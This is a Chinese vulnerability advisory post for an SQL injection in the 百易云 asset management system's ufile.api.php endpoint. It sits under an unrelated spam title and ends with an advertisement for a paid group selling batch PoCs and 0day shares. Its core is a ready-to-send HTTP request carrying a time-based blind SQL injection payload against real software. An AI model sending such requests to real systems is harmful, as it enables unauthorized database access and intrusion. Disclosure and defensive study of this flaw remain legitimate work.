专业建设购物网站,网站推广建站,网站代码优化有哪些,wordpress 本地加速0x01 免责声明
请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;作者不为此承担任何责任。工具来自网络#xff0c;安全性自测#xff0c;如有侵权请联系删…0x01 免责声明
请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任。工具来自网络安全性自测如有侵权请联系删除。本次测试仅供学习使用如若非法他用与平台和本文作者无关需自行负责
0x02 产品介绍
百易云资产管理运营系统是专门针对企业不动产资产管理和运营需求而设计的一套综合解决方案。该系统能够覆盖资产的全生命周期管理包括资产的登记、盘点、评估、处置等多个环节同时提供强大的运营分析功能帮助企业优化资产配置提升运营效率。
0x03 漏洞威胁
百易云资产管理运营系统 ufile.api.php 接口存在SQL注入漏洞未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息例如管理员后台密码、站点的用户个人信息之外甚至在高权限的情况可向服务器中写入木马进一步获取服务器系统权限。
0x04 漏洞环境
FOFA:
body不要着急点此 0x05 漏洞复现
PoC
GET /api/file/ufile.api.php?actfiledelfid1%20AND%20(SELECT%207357%20FROM%20(SELECT(SLEEP(4)))UPCw) HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept: application/json, text/javascript, */*; q0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive
延时执行2次 0x06 批量脚本验证
Nuclei验证脚本已发布知识星球冷漠安全 0x07 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
0x08 加入我们
漏洞详情及批量检测POC工具请前往知识星球获取
知识星球冷漠安全 交个朋友限时优惠券加入立减25 星球福利每天更新最新漏洞POC、资料文献、内部工具等 「星球介绍」
本星球不割韭菜不发烂大街东西。欢迎进来白嫖不满意三天退款。
本星球坚持每天分享一些攻防知识包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。
本星主已加入几十余个付费星球定期汇聚高质量资料及工具进行星球分享。 「星球服务」 加入星球你会获得 ♦ 批量验证漏洞POC脚本 ♦ 0day、1day分享 ♦ 汇集其它付费星球资源分享 ♦ 大量的红蓝对抗实战资源 ♦ 优秀的内部红蓝工具及插件 ♦ 综合类别优秀Wiki文库及漏洞库 ♦ 提问及技术交流
